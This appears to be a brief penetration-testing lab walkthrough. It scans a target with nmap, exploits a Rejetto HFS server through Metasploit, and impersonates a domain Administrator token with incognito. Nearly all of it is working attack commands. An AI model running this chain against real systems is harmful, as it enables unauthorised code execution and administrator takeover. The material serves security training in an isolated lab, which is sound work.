In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.
nmap -sSVC demo.ine.local
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set rhosts demo.ine.local
run
load incognito
list_tokens -u # List available tokens
impersonate_token "ATTACKDEFENSE\Administrator"
getuid